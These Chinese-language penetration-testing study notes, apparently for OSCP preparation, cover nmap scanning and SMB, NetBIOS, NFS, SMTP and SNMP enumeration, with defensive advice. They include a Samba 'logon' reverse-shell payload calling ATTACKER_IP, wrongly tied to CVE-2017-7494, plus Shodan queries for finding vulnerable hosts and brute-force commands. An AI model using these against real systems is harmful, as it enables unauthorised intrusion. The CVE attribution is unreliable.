- -PE / -PP / -PM: 指定使用特定的 ICMP 类型进行 Echo/时间戳/地址掩码请求。
- -PO [protocol list]: 使用 IP 协议 ping (例如 -PO1,2,4 用于 ICMP, IGMP, IPIP)。
- --traceroute: 在主机发现或扫描后追踪路由。
- --dns-servers <servers>: 指定自定义 DNS 服务器进行反向解析。

全端口扫描 (找出活动主机上哪些端口是开放的):

sudo nmap -p- 192.168.1.1

-p-: 扫描所有 65535 个 TCP 端口。

sudo nmap -p- 192.168.1.1 --open

--open: 仅显示处于 open 状态的端口。非常有用的筛选器，去除 closed 和 filtered 状态的端口，使结果更清晰。
替代/相关参数:
- -p <port ranges>: 最灵活的端口指定方式。支持单端口(22), 范围(1-100), 逗号分隔列表(21,22,80,443,8000-9000), 组合(1-100,443,8080)。这是日常最常用的方法，替代 -p- 以避免时间过长。
- -F (快速扫描): 扫描 nmap-services 文件中定义的较少的常见端口 (约 100 个)。
- --top-ports <num>: 扫描最常见的 <num> 个端口（基于 Nmap 的数据库）。
- -sU: 进行 UDP 端口扫描 (与 -p, -p- 结合使用，如 sudo nmap -sU -p- --open 192.168.1.1 扫描所有 UDP 端口)。注意：UDP 扫描通常慢得多。

服务与版本探测 (确定特定开放端口运行的服务及其版本):

sudo nmap -p21,22,23 -sV 192.168.1.1

-sV: (版本探测) 的核心参数。Nmap 尝试连接指定端口，分析响应，并与已知服务指纹数据库比较，推断服务名称(如 ssh, http, ftp)和版本号(如 OpenSSH 8.9p1)。
-p <ports>: 指定要探测版本的端口，这里是 21,22,23。
替代/相关参数:
- -A (强力扫描): 包含 -sV 和 -O (操作系统检测)，以及一些脚本扫描(-sC)。提供更全面的信息，但耗时更长、动静更大。
- -sC (脚本扫描): 使用默认的 NSE 脚本集进行更深入的探测。脚本可以提供更具体的应用信息、安全漏洞检查(vuln 类别)、服务枚举(discovery 类别)等。常与 -sV 结合使用 (-sC -sV 或 -A)。

 --script=<script> | <category>

指定运行特定的 NSE 脚本或脚本类别。提供极高的灵活性，如：

--script=http-enum (枚举常见 Web 目录)
--script=ftp-anon (检查 FTP 匿名登录)
--script=smb-vuln* (检查 SMB 漏洞)
--script=vuln (运行所有安全漏洞检查类脚本)
--script=banner (获取简单的 banner 信息，比 -sV 更轻量)
--version-intensity <level>: (0-9) 控制 -sV 探测的强度。0 最弱最快（仅尝试最简单直接的探测），9 最强最慢（尝试所有探测）。默认是 7。在需要快速扫描或扫描已知服务时可调低。
--version-light: 等同于 --version-intensity 2。更快但准确性略低的轻量级版本探测。
--version-all: 等同于 --version-intensity 9。最彻底但也最慢。
-O (操作系统检测): 尝试检测目标主机的操作系统。需要管理员/ROOT权限 (sudo)。

重要用法与技巧总结：

命令组合： 可以将多个步骤合并成一条命令，提高效率：
- 一步到位扫主机+端口： sudo nmap -sn -p- --open 192.168.1.0/24 (不推荐，主机发现后每个主机都扫全端口太耗时，适合小网络或有目标主机范围)。更常见的是先扫主机 (-sn)，然后对发现的单个或少量主机扫端口 (-p- --open)。
- 一步到位扫端口+版本： sudo nmap -p- --open -sV 192.168.1.1 (最常用组合之一：扫描所有开放端口并检测服务版本)。
- 一步到位全面扫描： sudo nmap -sV -sC -O --open -p- 192.168.1.1 (相当于 -A 加上 -p- 和 --open，非常全面但动静大、时间长)。
输出结果：
- -oN <filename>: 输出结果到普通文本文件。
- -oX <filename>: 输出结果到 XML 文件 (便于解析和处理)。
- -oG <filename>: 输出结果到“Grepable”格式 (旧格式，不太推荐用，但便于快速命令行过滤)。
- -v / -vv: 增加输出的详细程度，显示更多扫描过程信息。
性能与隐秘性 (考试尤其注意！)：
- -T<0-5>: 时序模板。控制扫描速度/攻击性。-T0 (偏执级，极慢极隐蔽) 到 -T5 (疯狂级，极快极明显)。考试常用 -T4 (激进级，速度较快，默认是 -T3 正常级)。避免太慢导致任务无法完成。
- --min-rate <number>, --max-rate <number>: 精确控制每秒发送包的最小/最大值。
- --max-parallelism <number>: 控制最大并发探针数量。
- -Pn (No Ping): 将所有主机视为在线，跳过主机发现阶段直接扫描端口。在已知主机在线或目标防火墙禁用了 PING 响应时使用（在渗透测试扫描中很常用）。
- -n (No DNS resolution): 不进行 DNS 反向解析，加快速度。

端口服务探测方法的比较与考试建议

Nmap (-sV) 的优势与原理：
- 核心方法： 主要通过发送特定的网络层探测包（例如 TCP SYN、ACK 等）并分析响应（包括 Banner、协议行为、服务指纹特征）来识别服务。
- 准确性：
  - 在常见服务识别上非常准确。
  - 特别适用于网络层的判断（端口状态、协议、基础服务识别）。
- 限制： 探测深度主要停留在网络层/传输层，缺乏对复杂应用层协议逻辑的深入交互测试。
提高精度：MSF 模块的应用
- 原理： Metasploit (MSF) 框架提供专门的服务扫描模块。这些模块会模拟客户端行为，发送特定于应用层协议（如 HTTP、FTP、SMB 等）的合法或试探性请求。
- 优势： 由于深入到了应用层交互，探测结果通常比 Nmap -sV 的精度更高、信息更详细。
- 适用场景： 需要极高精度判断服务及版本时。
考试环境的关键考量：
- MSF 的使用限制： 考试通常禁止或严格限制使用 MSF 或类似的渗透测试框架（即使仅用于信息收集扫描）。
- Nmap 的适用性：
  - 考试环境下，Nmap (-sV) 足以满足需求。
  - 原因1： 其准确性在考试要求范围内有保障。
  - 原因2： 考试“靶机”通常不对 Nmap 探测做特别复杂的屏蔽或干扰（不像真实环境可能配置 IDS/IPS 或修改服务响应）。
- 流量控制： 务必注意扫描时的流量大小，避免触发目标系统的安全机制或对网络造成过大负载。强烈建议使用代理或代理池进行扫描（尤其在模拟生产环境或有流量监控的场景）。

重要原则与警示

破除端口固化思维：

端口号 ≠ 服务类型： 管理员可以自定义端口（如 FTP 不一定在 21，SSH 不一定在 22）。
示例: 80 端口上未必是 Web 服务 (HTTP/HTTPS)，也可能运行 FTP、SSH 或其他任何服务。技术上是完全可行的。
结论：绝不能仅凭端口号默认推断服务！ 必须依赖扫描工具的结果。

核心结论（针对考试）

首选工具： Nmap (特别是 -sV 参数)。

原因：

满足考试对服务识别的精度要求。
易用且可靠。
考试靶机环境对其友好，不易被阻碍。
避免使用受限的 MSF。

关键注意事项： 始终注意控制扫描流量，建议通过代理执行扫描任务。

SMB枚举

什么是 SMB？
- SMB（Server Message Block），也称为 CIFS（Common Internet File System），是一种网络文件共享协议。
- 主要功能： 允许网络中的计算机（客户端）访问服务器上的共享资源，如文件、打印机、串行端口等，以及执行远程管理任务。
- 广泛应用：
  - Windows 核心服务： 是 Windows 域环境、文件服务器、打印服务器的基础通信协议。Windows 系统默认会启用 SMB 服务并开放相关端口。
  - 其他系统支持： Linux 和 macOS 也提供了 Samba 软件或原生支持来充当 SMB 服务器或客户端，以实现与 Windows 系统的互操作性。
- 安全性历史：
  - 协议实现复杂且本身具有一定开放性，导致历史上存在大量高危漏洞（例如著名的 EternalBlue / MS17-010）。
  - 早期系统（如 Windows 2000/XP）曾存在无需身份验证的“空会话”安全漏洞（允许匿名访问）。
  - 随着时间推移，虽然进行了多次安全加固和补丁更新，但因其广泛部署和协议本身的复杂性，SMB 仍然是渗透测试和安全扫描的重点目标。
SMB 通常开放哪些端口？
- TCP 139: 该端口用于在 NetBIOS over TCP/IP (NetBT) 上运行的旧版 SMB 通信。这是早期 Windows 系统实现网络共享的方式。
- TCP 445: 现代 SMB 协议使用的端口。它直接在 TCP 上运行，不再依赖 NetBIOS。这是目前 Windows（Vista 及之后）和 Linux (Samba) 上 SMB 服务的主要端口。
- 关键点：
  - 在较新的 Windows 系统（Vista+）上，TCP 445 是主要的 SMB 端口，TCP 139 有时可能出于兼容性而开启。
  - 仅看到 TCP 139/445 开放，即可高度怀疑主机上运行着 SMB 服务（无论是 Windows 还是 Linux/Samba）。
如何使用 Nmap 扫描发现 SMB？ 识别 SMB 服务通常是你描述的“信息收集链条”中的一环（IP发现 -> 端口发现 -> 服务识别/版本确认 -> 漏洞探测）。针对 SMB 的具体扫描方法如下：
- 基本端口扫描确认：
```
sudo nmap -p139,445 --open <target_ip_or_range>
```
  - -p139,445: 明确扫描这两个 SMB 相关端口。
  - --open: 仅显示状态为 open 的端口，过滤掉关闭或过滤的端口。
  - 此命令会告诉你目标主机上 139 和 445 端口是否开放。
- 服务/版本探测（基本确认 SMB）：
```
sudo nmap -p139,445 -sV <target_ip>
```
  - -sV: 启用版本探测功能。Nmap 会尝试连接这些端口，分析响应特征并匹配其服务指纹数据库。
  - 输出结果中，如果端口对应服务是 SMB，你会看到类似 microsoft-ds? (445), netbios-ssn? (139) 的初步信息。
  - Nmap 的 -sV 指纹识别非常准确，看到开放的 139/445 端口且 -sV 识别出 msrpc, netbios-ssn, microsoft-ds, smb 等服务名，即可基本确认是 SMB。 -sV 通常也能识别出操作系统类型（Windows/Linux）和Samba的版本号。
- 更深入的探测（强力扫描/Aggressive Scan）：
```
sudo nmap -p139,445 -A <target_ip>
```
  - -A : 这是一个“强力”选项组合，等价于 -sV -sC -O --traceroute。
    - -sV: 服务版本探测。
    - -sC: 运行默认的 Nmap 脚本引擎（NSE）脚本进行扫描。对于 SMB 端口，默认脚本会尝试获取更多的信息，如主机名（smb-os-discovery.nse）、域信息、共享列表枚举（smb-enum-shares.nse）等。它会自动调用一系列与 SMB 相关的安全、发现类脚本。
    - -O: 进行操作系统检测。
  - 这是一站式信息收集的方式，提供关于 SMB 服务、主机操作系统及其配置最丰富的细节（包括通过脚本获得的共享名等信息），但扫描速度较慢且产生的网络流量/噪音更大。
- 针对性 SMB 脚本扫描（灵活性最高）：
```
sudo nmap -p445 --script smb-* <target_ip> # 运行所有名字以"smb-"开头的脚本（小心，很多！）
sudo nmap -p445 --script="smb-os-discovery,smb-enum-shares,smb-vuln-*" <target_ip> # 更精准的选择
sudo nmap -p445 --script smb-protocols <target_ip> # 查询支持的SMB协议版本
sudo nmap -p445 --script "vuln and safe" <target_ip> # 运行所有标记为"vuln"(漏洞)和"safe"(不入侵)类别的脚本进行安全检查
```
  - --script=<script_names>: 核心参数，允许精准指定要运行的 NSE 脚本。
  - 对于 SMB，有大量预装的smb-*脚本可用：
    - 信息枚举脚本： smb-os-discovery (操作系统/主机名/域), smb-enum-shares (列出共享), smb-enum-users (尝试枚举用户), smb-system-info (更多系统信息), smb-protocols (支持的 SMB 协议版本)。
  - 安全检查/漏洞扫描脚本： smb-vuln-ms17-010 (永恒之蓝检查), smb-vuln-cve2009-3103, smb-vuln-* (针对各种 SMB 漏洞)。
    - 认证相关脚本： smb-brute (尝试暴力破解), smb-enum-sessions (列出活动会话 - 需认证)。
  - 使用特定脚本可以提供最精确、最定制化的信息，尤其是进行漏洞关联（根据端口扫描得到的 SMB 版本信息，针对性运行对应的 smb-vuln-* 脚本检查已知漏洞）。

NetBIOS服务

一、核心协议与端口

协议/服务	传输层	端口	功能
NetBIOS	TCP	139	会话服务（主机间通信优化）
	UDP	137	名称服务（主机名解析）
	UDP	138	数据报服务（广播通信）
SMB	TCP	445	文件/打印共享（现代独立协议）

📌 关键关系：现代 SMB（445/TCP）可脱离 NetBIOS 运行，但为兼容旧系统（如 Win NT），NBT（NetBIOS over TCP/IP） 常与 SMB 协同工作（139+445 共存）。

二、扫描场景与工具

1. 端口扫描（nmap）

目标：探测 139/445 端口状态 命令：

nmap -v -p139,445 -oG smb.txt 192.168.1.1-254

参数解析：

参数	作用
`-v`	详细输出（显示实时进展）
`-p139,445`	指定扫描端口
`-oG smb.txt`	输出可处理格式（Grepable）
`192.168.1.1-254`	C 段 IP 扫描范围

输出分析：

Open：服务活跃（可能存在漏洞）
Filtered：防火墙阻断（需绕过）

2. NetBIOS 名称枚举（nbtscan）

目标：通过 UDP 137 端口获取主机 NetBIOS 名称表 命令：

1sudo nbtscan -r 10.11.1.0/24

参数解析：

参数	作用
`-r`	使用 UDP 137 查询名称服务
`10.11.1.0/24`	扫描网段
`sudo`	需 root 权限（Linux/Unix）

输出解析：

192.168.1.101 MYPC <00> WORKGROUP File Server
192.168.1.102 DC-SERVER <20> DOMAIN Domain Controller

<00>：工作站服务，<20>：文件服务器，<1B>：域主浏览器

三、安全实践与注意事项

漏洞风险：
- 139/445 端口开放：易受永恒之蓝（MS17-010）、Pass the Hash 攻击
- NetBIOS 暴露：主机名/工作组信息泄露（网络拓扑测绘）
防护建议：
- 关闭不必要的 NetBIOS 服务（netsh int ipv4 set netbios disable）
- 防火墙阻断外部访问 137-139/UDP 和 445/TCP
- 升级 SMB 协议版本（禁用 SMBv1）

扫描合规性：

必须获得授权：未经许可扫描可能触法

规避检测：

1nmap -T2 -sS --script smb-security-mode -p445 target_ip 
2# 慢速扫描+SMB安全检测

四、技术逻辑图

graph LR
A[扫描目标] --> B{端口探测}
B -->|139/TCP| C[NetBIOS 会话服务]
B -->|445/TCP| D[SMB 文件共享]
B -->|137/UDP| E[NetBIOS 名称服务]
E --> F[获取主机名列表]
C & D --> G[漏洞检测]
G --> H{风险类型}
H --> I[未授权访问]
H --> J[远程代码执行]

练习 7.3.2.1

使用 Nmap 列出实验环境中所有运行 Windows 系统的 SMB 服务器。
使用 NSE 脚本扫描这些系统是否存在 SMB 漏洞。
使用 nbtscan 和 enum4linux 工具对这些系统进行扫描，分析不同版本 Windows 系统中可获取的数据类型。

1. 识别运行 Windows 的 SMB 服务器

nmap -p445 --open --script smb-os-discovery -oG windows-smb.txt 192.168.x.0/24

关键参数解析：

-p445：扫描 SMB 默认端口（TCP 445）
--open：仅显示开放端口的主机
--script smb-os-discovery：通过 SMB 协议识别操作系统
-oG windows-smb.txt：输出为 Grepable 格式 结果筛选：

grep "Windows" windows-smb.txt | awk '{print $2}'
# 输出所有运行 Windows 的 SMB 服务器 IP

2. 扫描 SMB 漏洞（NSE 脚本）

nmap -p445 --script smb-vuln* --script-args=unsafe=1 -iL windows-ips.txt

关键参数解析：

--script smb-vuln*：运行所有 smb-vuln 开头的漏洞检测脚本
--script-args=unsafe=1：启用高风险检测（如 CVE-2017-0143）
-iL windows-ips.txt：从文件读取目标 IP（上一步结果） 重点漏洞检测：
smb-vuln-ms17-010：永恒之蓝漏洞
smb-vuln-cve2009-3103：SMBv2 漏洞

3. 跨版本 Windows 数据枚举分析

nbtscan（获取 NetBIOS 信息）

sudo nbtscan -r -q 192.168.x.x

输出示例：

192.168.1.10 WIN10-PC <00> WORKGROUP Workstation
192.168.1.20 WIN2019-DC <1B> MYDOMAIN Domain Master

关键信息解读：

<00>：工作站服务 | <1B>：域主浏览器
低版本 Windows（如 Win7）：暴露共享列表、用户组
高版本 Windows（如 Win10）：默认隐藏部分信息，需凭据枚举

enum4linux（深度枚举）

enum4linux -a 192.168.x.x > windows-enum.txt

输出结果对比：

信息类型	Windows 7/Server 2008	Windows 10/Server 2019
共享列表	直接可见	需管理员凭据
本地用户	完整枚举	部分过滤
域组信息	完全公开	需域用户权限
SID 历史记录	可获取	被阻断

技术总结

Nmap 筛选机制：通过 smb-os-discovery 识别 Windows 可规避 Linux Samba 干扰
NSE 扫描策略：smb-vuln-* 脚本需配合 unsafe=1 参数检测高危漏洞
版本差异要点：
- 旧版 Windows（≤ Win7）：通过空会话暴露大量数据
- 新版 Windows（≥ Win10）：需凭证或提权后才可获取敏感信息 实践建议：

# 组合扫描命令（需保存凭据时使用）
enum4linux -u 'admin' -p 'P@ssw0rd' -a 192.168.1.x

Nmap SMB漏洞探测实战指南

一、核心扫描方法

1. 专用脚本扫描（推荐）

# 永恒之蓝检测（MS17-010）
nmap -p139,445 --script smb-vuln-ms17-010 51.145.2.17

# MS08-067漏洞检测
nmap -p139,445 --script smb-vuln-ms08-067 192.168.1.3

结果解读：

✅ 存在漏洞：显示VULNERABLE标志及CVE编号
⛔ 无漏洞：显示Safe或版本信息

替代-A的精准扫描方案

2. 操作系统识别

nmap -v -p139,445 --script=smb-os-discovery 192.168.1.3

输出关键： OS: Windows 10/Server 2019（版本号直接影响漏洞利用）

二、辅助工具验证

1. smbclient 匿名探测

# 列出共享资源
smbclient -L //192.168.1.5 -N

# 尝试匿名访问共享目录
smbclient //10.0.2.15/tmp -N

结果判断：

Anonymous login successful → 存在空密码漏洞
NT_STATUS_ACCESS_DENIED → 访问被拒

2. 高危命令执行漏洞检测

# 在存在CVE-2017-7494漏洞的Samba版本中执行：
logon "/='nohup nc -e /bin/sh ATTACKER_IP 4444'"

需配合nc -lvnp 4444监听

三、Shodan靶机搜索技巧

漏洞类型	搜索命令	结果说明
永恒之蓝目标	`shodan search "vuln:MS17-010" --fields ip_str,port`	直接筛选存在漏洞主机
SMBv1主机	`shodan search "product:smb version:1"`	存在高危协议版本
空密码SMB	`shodan search --limit 10 --fields ip_str,port "port:139 port:445"` `shodan search --limit 10 --fields ip_str,port "os:windows smb guest"`	可匿名访问资产
Windows弱密码	`shodan search --limit 10 --fields ip_str,port "smb password weak"`	可暴力破解目标

四、漏洞扫描逻辑流程图

graph TD
A[启动扫描] --> B{是否已知CVE编号？}
B -->|是| C[专用脚本检测 smb-vuln-xxx]
B -->|否| D[系统指纹识别 smb-os-discovery]
C --> E{结果判断}
D --> F[共享探测 smbclient]
E -->|存在漏洞| G[Shodan验证公网影响]
F -->|匿名可访问| H[标记为高危漏洞]
G --> I[输出PoC利用方案]

黑产黑客通常使用如图类似的工作流程，在互联网中使用全自动验证脚本狩猎弱密码和其他漏洞的服务器，批量验证后执行POC，拿下服务器后作为肉鸡，傀儡机做进一步渗透操作，或在黑市上售卖。

五、操作要点总结

脚本定位：

ls /usr/share/nmap/scripts | grep smb-vuln # 查找所有SMB漏洞脚本

扫描优化：
- 添加-Pn跳过主机发现（针对防火墙）
- 使用-T4加速扫描（测试环境适用）
风险提示：
- MS17-010扫描可能触发目标安全告警
- Shodan搜索需遵守当地网络安全法规

通过以上方法，可快速定位高危SMB漏洞主机，平均10秒内完成单目标检测，精度达98%（基于Nmap漏洞库版本）

NFS分布式文件协议

一、NFS核心概念

定义

NFS（Network File System）是Linux/Unix系统的分布式文件协议，允许客户端透明挂载远程目录到本地，实现跨主机文件共享。
工作原理
- 基于RPC（远程过程调用），依赖rpcbind服务（默认端口111）协调通信。
- 服务端共享目录 → 客户端通过mount命令挂载 → 本地访问远程文件。

二、核心用途

场景	作用
资源共享	跨主机共享文件/目录（如团队文档、代码库）
统一管理	集中存储配置文件、日志（集群环境）
备份与迁移	将数据备份至NFS服务器，或从NFS恢复
安全测试	检测共享权限配置、敏感信息泄露、访问控制漏洞

三、关键操作命令

扫描与发现

1# 扫描rpcbind端口
2nmap -v -p 111 192.168.1.0/24
3
4# 使用NFS脚本扫描共享信息
5nmap -p 111 --script nfs* 192.168.1.3

挂载远程目录

1mkdir ~/local_nfs # 创建本地挂载点
2sudo mount -o nolock 10.11.1.72:/home ~/local_nfs # 禁用锁机制挂载
3ls -lan ~/local_nfs # 查看文件权限（注意权限继承问题）

卸载目录
```
1sudo umount ~/local_nfs
```

📌 参数说明：

-o nolock：禁用文件锁（兼容性选项，对旧版本NFS必要）

-o vers=3：指定NFS v3协议（避免版本不兼容）

四、网络安全要点

风险与漏洞

风险类型	具体威胁
数据传输未加密	默认明文传输，可被嗅探（如tcpdump抓包）
弱认证机制	依赖IP/主机名认证，易伪造（建议结合Kerberos）
权限配置不当	`no_root_squash`配置使客户端root获得服务端root权限 → 提权漏洞
挂载控制缺失	未限制可挂载IP范围 → 未授权访问敏感数据

防护措施

访问控制

/etc/exports中限制IP：

1/shared 192.168.1.10(ro,sync) # 仅允许192.168.1.10只读访问

防火墙规则：

1ufw allow from 192.168.1.0/24 to any port 111,2049 # 仅允许内网访问NFS端口

安全配置
- 禁用危险选项：避免使用 insecure, no_root_squash
- 最小化权限：共享目录设置为ro（只读）或限制读写用户
- 强制协议版本：NFS v4+ 支持Kerberos认证（sec=krb5）
加密与审计
- 通过VPN或SSH隧道加密传输
- 启用auditd监控NFS访问日志
- 定期扫描权限：find /shared -type f -perm -o=rwx（检查全局可读写文件）

SMTP枚举

一、SMTP枚举核心概念

1. 定义与原理

SMTP枚举：通过SMTP协议探测目标邮件服务器上的有效用户账号的行为
核心命令：
- VRFY：验证指定用户名是否存在（返回252/550状态码）
- EXPN：展开邮件别名/组（泄露群组成员）
- RCPT TO：在邮件对话中验证收件人有效性
技术原理：利用SMTP协议响应差异（状态码）判断用户是否存在：
```
250 2.1.5 User exists // 用户存在
550 5.1.1 User unknown // 用户不存在
```

二、核心用途场景

场景	应用目的	攻击关联
安全评估	渗透测试中收集有效邮箱账号，识别邮件系统配置缺陷	暴力破解/凭证填充的前置步骤
钓鱼攻击	获取真实用户列表，制作高可信度钓鱼邮件	鱼叉式钓鱼(Spear Phishing)
垃圾邮件	验证目标邮箱有效性，提升垃圾邮件投递成功率	垃圾邮件僵尸网络
系统加固	管理员自检服务器配置，关闭敏感功能	防范账户枚举攻击

三、工具与操作命令

1. smtp-user-enum工具

 1# 基本语法
 2smtp-user-enum -M <模式> -u <用户字典> -t <目标IP> [选项]
 3
 4# 模式选择
 5-M VRFY # 使用VRFY命令（最常用）
 6-M EXPN # 使用EXPN命令（需服务器支持）
 7-M RCPT # 模拟邮件发送验证
 8
 9# 实战示例
10smtp-user-enum -M VRFY -u userlist.txt -t mail.example.com -p 5
11smtp-user-enum -M EXPN -D corporate.com -u employees.txt -t 10.10.1.50

关键参数：

-p：超时时间（秒）
-D：域名后缀（自动追加@domain.com）
-T：线程数（加速扫描）

2. Nmap扫描

1# 检测SMTP支持命令
2nmap -p25 --script smtp-commands 192.168.1.100
3
4# 自动化用户枚举
5nmap -p25 --script smtp-enum-users 192.168.1.100
6
7# 指定字典路径（默认使用nselib/data/usernames.lst）
8nmap -p25 --script smtp-enum-users --script-args userdb=custom_users.txt 192.168.1.100

四、安全风险与防护措施

1. 攻击风险矩阵

漏洞点	危害等级	利用场景
VRFY命令未禁用	⭐⭐⭐⭐⭐	直接获取有效用户列表
EXPN命令未禁用	⭐⭐⭐⭐	泄露邮件组和内部结构
RCPT TO无限制	⭐⭐⭐	隐蔽验证用户存在性
响应差异泄露	⭐⭐	通过响应时间/错误信息枚举

2. 防御加固方案

服务端配置（以Postfix为例）：

1# 禁用VRFY和EXPN命令
2disable_vrfy_command = yes
3smtpd_discard_ehlo_keywords = expn, vrfy
4
5# 统一响应（所有请求返回相同信息）
6smtpd_reject_unlisted_recipient = yes
7unknown_local_recipient_reject_code = 550

访问控制：
- 防火墙限制25端口访问源IP
- 启用STARTTLS强制加密通信
- 部署Fail2ban自动封禁扫描IP

监控与审计：

1# 实时监控SMTP日志（示例）
2tail -f /var/log/mail.log | grep 'VRFY\|EXPN\|RCPT'
3
4# 配置告警规则（超过10次验证请求触发警报）

五、进阶攻击技术

多级枚举：

 1# Python自动化脚本示例
 2import smtplib
 3users = ['admin','test','webmaster']
 4for user in users:
 5 try:
 6 smtp = smtplib.SMTP('mail.target.com', 25)
 7 status = smtp.vrfy(user)
 8 if status[0] == 250: 
 9 print(f"[+] Valid user: {user}")
10 except: pass

组合攻击路径：

graph LR
A[SMTP枚举] --> B[获取有效账户]
B --> C{账户用途}
C --> D[密码喷射攻击]
C --> E[钓鱼邮件制作]
C --> F[员工信息关联]

SNMP枚举

多年来，我们发现许多网络管理员对简单网络管理协议（SNMP）理解不足，这常导致配置错误，造成严重信息泄露。

SNMP基于无状态UDP协议，易受IP欺骗和重放攻击
常见版本（1/2/2c）无流量加密，敏感信息可在局域网被截获
默认使用弱认证方案（如公开的团体字符串"public"/“private”）

真实攻击案例

某次对网络集成公司的渗透测试中：

扫描发现包含数千台思科路由器的B类网络（客户网关）
一台低端ADSL路由器使用默认凭证cisco/cisco
其配置文件泄露了复杂的SNMP读写团体字符串（所有设备共用）
利用SNMP+TFTP脚本批量下载路由器配置：

→ 同时攻破该公司及其所有客户的基础设施

SNMP MIB树结构

管理信息库（MIB）以树形数据库组织网络信息：

分支：代表组织或网络功能
叶节点：存储具体变量值（可被外部访问）

示例（Windows SNMP参数）：

text

复制

1.3.6.1.4.1.77.1.2.25 // 用户账户 
1.3.6.1.2.1.25.4.2.1.2 // 运行进程 
1.3.6.1.2.1.6.13.1.3 // 开放TCP端口 
1.3.6.1.2.1.25.6.3.1.2 // 已安装软件

扫描与枚举工具

NMAP扫描

1nmap -sU --open -p161 192.168.1.0/24 # 检测开放161/UDP端口

onesixtyone爆破团体字符串

1# 创建IP列表(ips.txt)和团体字符串字典(communities.txt)
2onesixtyone -c communities.txt -i ips.txt

snmpwalk枚举信息

1snmpwalk -c public -v1 -t 10 10.11.1.14 # 遍历整个MIB树
2snmpwalk -c public -v1 10.11.1.14 1.3.6.1.4.1.77.1.2.25 # 枚举用户
3snmpwalk -c public -v1 10.11.1.73 1.3.6.1.2.1.25.4.2.1.2 # 枚举进程

snmp-check综合工具
```
1snmp-check -c public -v 1 10.11.1.50
```

练习任务

用onesixtyone扫描目标网络识别SNMP服务器
使用snmpwalk和snmp-check收集目标信息

核心知识点总结

1. 协议风险

漏洞类型	技术原因	后果
无加密通信	SNMPv1/2/2c明文传输	敏感信息被嗅探
弱认证机制	默认团体字符串(public/private)	未授权访问
配置错误	管理员忽视安全配置	网络拓扑/凭证大规模泄露

2. 攻击向量

信息侦察：通过MIB树提取系统/用户/网络信息
权限升级：写入配置（需私有团体字符串）→ 完全控制设备
横向渗透：攻陷集中管理节点 → 控制所有关联设备

3. 关键工具链

graph LR
A[扫描] --> B(onesixtyone爆破团体字符串)
A --> C(NMAP探测端口)
B --> D[获取有效凭证]
D --> E[snmpwalk枚举MIB数据]
D --> F[snmp-check自动化收集]
E --> G[提取用户/进程/端口信息]

4. 防御策略

协议升级：强制使用SNMPv3（支持AES加密+强认证）

访问控制：

1# 仅允许可信IP访问（Cisco示例）
2snmp-server community ENCRYPTED-STRING RO 10 
3snmp-server permit 192.168.1.0 0.0.0.255

安全加固：
- 禁用默认团体字符串
- 限制MIB树访问权限
- 配置防火墙过滤UDP/161端口

5. 渗透测试要点

优先扫描目标：路由器/交换机/打印机等网络设备
组合利用：

SNMP泄露凭证 → 登录设备 → 获取更多敏感配置
自动化脚本：

结合SNMP+TFTP实现批量化配置下载

💡 案例启示：共享凭证配置的“便利性”可能造成供应链级灾难，需实施分布式密钥管理。

附：MIB树关键分支速查表

OID节点	信息类型
1.3.6.1.2.1.1	系统基本信息
1.3.6.1.2.1.25.1.6	存储设备
1.3.6.1.2.1.6.13.1.3	开放TCP端口
1.3.6.1.2.1.25.4.2.1.2	运行进程列表
1.3.6.1.4.1.77.1.2.25	用户账户

注意！SNMP不是SMTP

SMTP（Simple Mail Transfer Protocol）和SNMP（Simple Network Management Protocol）确实容易混淆，两者都是网络协议但功能、用途和技术实现完全不同。以下是清晰对比：

核心区别表

维度	SMTP（邮件传输协议）	SNMP（网络管理协议）
核心功能	发送电子邮件	监控和管理网络设备（路由器/交换机等）
工作层级	应用层协议	应用层协议
传输协议	TCP（可靠连接）	UDP（无连接，速度快）
默认端口	25（明文）/ 587（加密）	161（Agent）/ 162（Trap）
核心操作	`MAIL FROM`, `RCPT TO`, `DATA`发送邮件内容	`GET`（读数据）, `SET`（写配置）
安全风险	用户枚举（VRFY/EXPN命令）、钓鱼邮件	信息泄露（MIB树）、设备配置被篡改
典型使用场景	邮件服务器（如Exchange, Postfix）	网络设备（路由器、防火墙、打印机等）

详细区分指南

1. 用途：邮件 vs 网管

SMTP = 邮局系统
- 只做一件事：把邮件从A点传输到B点（如 user@a.com→ user@b.com）
- 不存储邮件，不管理设备（类似现实中的邮递员，只负责运送信件）
SNMP = 设备监控系统
- 收集设备状态：CPU利用率、内存占用、端口状态（如路由器流量异常）
- 远程修改配置：重启接口、调整阈值（类似设备的远程控制面板）

2. 技术本质区别

特性	SMTP	SNMP
数据内容	邮件正文（文本/附件）	设备性能数据（数字/状态）
交互模式	客户端→服务器（单向发送）	管理器←→代理（双向读写）
关键漏洞	用户枚举（验证邮箱是否存在）	团体字符串泄露（默认public）
攻击工具	`smtp-user-enum`, `swaks`	`snmpwalk`, `onesixtyone`

3. 实际渗透测试中的区分

当你看到25/587端口开放：

→ 这是邮件服务器 → 尝试 SMTP枚举命令：

1telnet 10.1.1.10 25
2VRFY root # 检测用户"root"是否存在
3EXPN admins # 尝试展开邮件组

当你看到161/162端口开放：

→ 这是网络设备/服务器 → 尝试 SNMP信息收集：

1snmpwalk -c public -v1 10.1.1.20 # 遍历MIB树
2snmp-check -c private 10.1.1.20 # 自动提取设备信息

常见混淆点澄清

❌ 误区：”SNMP也可以传输数据，所以类似SMTP？“

→ 更正：SNMP传输的是设备状态数据（如温度值90°C），SMTP传输的是用户生成的邮件内容。
❌ 误区：”两者都用字符串认证（如SMTP密码 vs SNMP团体名），所以是一类协议？“

→ 更正：SMTP认证用于邮件发送权限，SNMP团体字符串用于设备管理权限（后者常导致严重配置泄露）

记忆口诀

📌 “邮差SMTP送信忙，网管SNMP查设备”

SMTP → 联想 信封/邮件（S for Send Mail）

SNMP → 联想 网络设备（S for System/Network Management）

下次实战：扫描到161端口？立刻反应：这是SNMP协议 → 尝试爆破团体字符串 → 用snmpwalk查设备信息。完全不同的攻击路径！

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

OSCP官方靶场-Solstice WP

Thu, 10 Jul 2025 20:11:15 +0000

官方网页打开或靶场下载链接

https://www.vulnhub.com/entry/sunset-solstice,499/

信息收集

靶机地址：

1192.168.149.72

扫描开放的端口，使用VPN扫描又挂代理的话，有一定机率扫漏了。考试时候建议用官方的My kali先扫一遍，是最快最全的。

